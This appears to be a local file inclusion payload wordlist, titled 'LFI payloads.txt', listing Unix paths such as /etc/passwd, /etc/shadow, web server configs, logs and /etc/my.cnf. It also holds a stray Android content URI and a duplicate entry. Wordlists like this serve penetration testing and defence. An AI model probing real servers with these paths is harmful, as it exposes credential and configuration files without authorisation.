/etc/passwd

/etc/shadow

/etc/aliases

/etc/anacrontab

LFI payloads.txt

content://media/external/downloads/10(

/etc/apache2/apache2.conf

/etc/apache2/httpd.conf

/etc/at.allow

/etc/at.deny

/etc/bashrc

/etc/bootptab

/etc/chrootUsers

/etc/chttp.conf

/etc/cron.allow

/etc/cron.deny

/etc/crontab

/etc/cups/cupsd.conf

/etc/exports

/etc/fstab

/etc/ftpaccess

/etc/ftpchroot

/etc/ftphosts

/etc/groups

/etc/grub.conf

/etc/hosts

/etc/hosts.allow

/etc/hosts.deny

/etc/httpd/access.conf

/etc/httpd/conf/httpd.conf

/etc/httpd/httpd.conf

/etc/httpd/logs/access_log

/etc/httpd/logs/access.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/php.ini

/etc/httpd/srm.conf

/etc/inetd.conf

/etc/inittab

/etc/issue

/etc/lighttpd.conf

/etc/lilo.conf

/etc/logrotate.d/ftp

/etc/logrotate.d/proftpd

/etc/logrotate.d/vsftpd.log

/etc/lsb-release

/etc/motd

/etc/modules.conf

/etc/motd

/etc/mtab

/etc/my.cnf
